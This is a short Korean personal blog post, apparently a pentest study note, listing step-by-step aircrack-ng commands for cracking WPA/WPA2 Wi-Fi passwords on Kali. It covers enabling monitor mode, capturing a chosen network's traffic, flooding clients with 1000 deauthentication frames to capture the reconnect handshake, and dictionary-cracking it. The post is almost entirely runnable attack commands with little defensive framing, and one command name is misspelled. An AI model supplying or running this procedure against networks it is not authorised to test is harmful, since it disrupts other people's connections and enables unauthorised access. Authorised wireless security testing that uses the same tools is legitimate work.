의미없는 블로그
WiFi 크랙 (WPA/WPA2) 본문
사전파일 있어야 한다
Kali 에서 하려면 USB LAN 카드 있어야 함 (내껀 Netis WF2120 8천원인가)
꽂으면 VM 에서 USB 인식 창 뜸
iwconfig 하면 wlan0 인식됨
airmon-ng check kill
> 방해되는 프로세스 kill 하는거
airmon-ng start wlan0
> wlan0 인터페이스 wlan0mon 으로 복제
airodump-ng wlan0mon
> 와이파이 정보 캡쳐
> 여기서 공격 대상 채널(CH), 맥주소(BSSID) 확인
airdump-ng -c 채널 --bssid 맥주소 -w /root/Desktop/ wlan0mon
> 공격 대상 패킷 캡쳐하는거
> 결과 파일(.cap)은 /root/Desktop/ 하위에 저장될 것
aireplay-ng --deauth 1000 -a 맥주소 wlan0mon
> 와이파이 끊는 공격 수행
> 1000번 수행
> 여기서 끊기면 단말들이 다시 붙을때 handshake 하는데 그거 캡쳐하는거
혹시 channel 에러 나면 아래 참고
aircrack-ng -a2 -b 맥주소 -w 사전파일 result.cap
> -a2 는 WPA2 크랙할때, -a 는 WPA
> 아마 cap 파일은 -01.cap 이렇게 생성됐을건데 result.cap 으로 이름 바꿔줬다
'# 나 > pentest (WEB)' 카테고리의 다른 글
AWS Local > EC2 파일 전송이요 (윈도우) (0) | 2023.02.02 |
---|---|
SSRF 취약점 (0) | 2023.01.05 |
SSH RSA 공개키로 접속 (0) | 2022.12.15 |
그누보드 SQL Injection (Error Based) (0) | 2022.12.09 |
Spring Actuator 취약점 (0) | 2022.12.01 |
Comments